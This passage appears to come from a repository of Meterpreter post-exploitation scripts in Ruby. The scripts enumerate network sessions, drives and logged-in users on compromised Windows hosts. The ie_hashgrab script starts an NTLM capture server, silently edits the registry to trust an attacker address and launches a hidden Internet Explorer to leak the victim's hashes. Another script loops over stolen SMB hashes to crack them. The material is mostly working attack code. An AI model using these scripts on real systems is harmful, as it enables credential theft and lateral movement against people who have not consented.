16*count) 5 | count.times{|i| 6 | x = {} 7 | cnameptr = mem[(base + 0),4].unpack("V*")[0] 8 | usernameptr = mem[(base + 4),4].unpack("V*")[0] 9 | x[:usetime] = mem[(base + 8),4].unpack("V*")[0] 10 | x[:idletime] = mem[(base + 12),4].unpack("V*")[0] 11 | x[:cname] = 
client.railgun.memread(cnameptr,255).split("\0\0")[0].split("\0").join 12 | x[:username] = client.railgun.memread(usernameptr,255).split("\0\0")[0].split("\0").join 13 | netsessions << x 14 | base = base + 16 15 | } 16 | return netsessions 17 | end 18 | 19 | client.railgun.add_function('netapi32', 'NetSessionEnum', 'DWORD',[ 20 | ['PWCHAR','servername','in'], 21 | ['PWCHAR','UncClientName','in'], 22 | ['PWCHAR','username','in'], 23 | ['DWORD','level','in'], 24 | ['PDWORD','bufptr','out'], 25 | ['DWORD','prefmaxlen','in'], 26 | ['PDWORD','entriesread','out'], 27 | ['PDWORD','totalentries','out'], 28 | ['PDWORD','resume_handle','inout'] 29 | ]) 30 | 31 | 32 | buffersize = 500 33 | result = client.railgun.netapi32.NetSessionEnum("167.228.2.166",nil,nil,10,4,buffersize,4,4,nil) 34 | print_error(result.inspect) 35 | if result['return'] == 5 36 | print_error("Access Denied when trying to access that host") 37 | raise Script::Completed 38 | elsif result['return'] == 53 39 | print_error("Host not found or could not be contacted") 40 | raise Script::Completed 41 | elsif result['return'] == 123 42 | print_error("Invalid host") 43 | raise Script::Completed 44 | elsif result['return'] == 0 45 | print_status("#{result['totalentries']} sessions identified") 46 | else 47 | print_status("Recieved a error code I didn't account for: #{result['return']}") 48 | raise Script::Completed 49 | end 50 | 51 | print_status("Finding the right buffersize...") 52 | while result['return'] == 234 53 | print_status("Tested #{buffersize}, got #{result['entriesread']} of #{result['totalentries']}") 54 | buffersize = buffersize + 500 55 | result = client.railgun.netapi32.NetSessionEnum(nil,nil,nil,10,4,buffersize,4,4,nil) 56 | end 57 | 58 | netsessions = read_session_struct(result['bufptr'],result['totalentries']) 59 | if netsessions.size > 0 60 | netsessions.each do |x| 61 | print_status("#{x[:username]} is logged in from #{x[:cname]} and has been idle for #{x[:idletime]} seconds") 62 | end 63 | end 
64 | 65 | -------------------------------------------------------------------------------- /scripts/ie_hashgrab.rb: -------------------------------------------------------------------------------- 1 | mul = client.framework.auxiliary.create("server/capture/http_ntlm") 2 | 3 | mul.datastore['URIPATH'] = "/" 4 | 5 | mul.datastore['JTRFILE'] = "/tmp/jtrfile" 6 | 7 | mul.run_simple( 8 | 'RunAsJob' => true 9 | ) 10 | 11 | client.sys.process.execute("cmd.exe /c echo Windows Registry Editor Version 5.00 > test.reg", nil, {'Hidden' => 'true'}) 12 | 13 | client.sys.process.execute("cmd.exe /c echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Ranges\\Range10] >> test.reg", nil, {'Hidden' => 'true'}) 14 | 15 | client.sys.process.execute("cmd.exe /c echo \"http\"\=dword\:00000001 >> test.reg", nil, {'Hidden' => 'true'}) 16 | 17 | client.sys.process.execute("cmd.exe /c echo \"\:Range\"\=\"192.168.139.128\" >> test.reg", nil, {'Hidden' => 'true'}) 18 | 19 | client.sys.process.execute("cmd.exe /c regedit.exe \-s test.reg", nil, {'Hidden' => 'true'}) 20 | 21 | 22 | client.sys.process.execute("c:\\program files\\internet explorer\\iexplore.exe -new http://192.168.139.128:8080/" , nil, {'Hidden' => 'true'}) 23 | -------------------------------------------------------------------------------- /scripts/listdrives.rb: -------------------------------------------------------------------------------- 1 | # Author - mubix 2 | # http://www.room362.com/blog/2010/7/7/intro-to-railgun-win-api-for-meterpreter.html 3 | # Make the API call to enum drive letters 4 | a = client.railgun.kernel32.GetLogicalDrives()["return"] 5 | # Math magic to convert the binary to letters 6 | drives = [] 7 | letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 8 | (0..25).each do |i| 9 | test = letters[i,1] 10 | rem = a % (2**(i+1)) 11 | if rem > 0 12 | drives << test 13 | a = a - rem 14 | end 15 | end 16 | print_line("Drives Available = #{drives.inspect}") 17 | 
-------------------------------------------------------------------------------- /scripts/loggedon.rb: -------------------------------------------------------------------------------- 1 | # Author - mubix 2 | # http://www.room362.com/blog/2011/9/17/who-is-logged-in-a-quick-way-to-pick-your-targets.html 3 | users = [] 4 | client.sys.process.each_process do |x| 5 | users << x["user"] 6 | end 7 | 8 | users.sort! 9 | users.uniq! 10 | users.delete_if {|x| x =~ /^NT\ AUTHORITY/} 11 | users.delete_if {|x| x == ""} 12 | loggedin = users.join(', ') 13 | -------------------------------------------------------------------------------- /scripts/search_hash_creds.rc: -------------------------------------------------------------------------------- 1 | # Not for distribution -- just an example of looping through creds to do things 2 | # with them. However, duckduck_password and this script should certainly just 3 | # be combined into one plugin, rather than a module. 4 | 5 | use auxiliary/gather/duckduck_password 6 | 7 | framework.db.creds.select {|c| c.ptype == "smb_hash"}.each do |cred| 8 | lm,ntlm = cred.pass.split(":") 9 | run_single("set HASH #{lm}") 10 | print_status "#{cred.service.host.address}:#{cred.service.port}:#{cred.user} Checking LM hash..." 11 | run_single("run") 12 | select(nil,nil,nil,1) 13 | run_single("set HASH #{ntlm}") if ntlm 14 | print_status "#{cred.service.host.address}:#{cred.service.port}:#{cred.user} Checking NTLM hash..." 15 | run_single("run") 16 | select(nil,nil,nil,1) 17 | end 18 | 19 | 20 | --------------------------------------------------------------------------------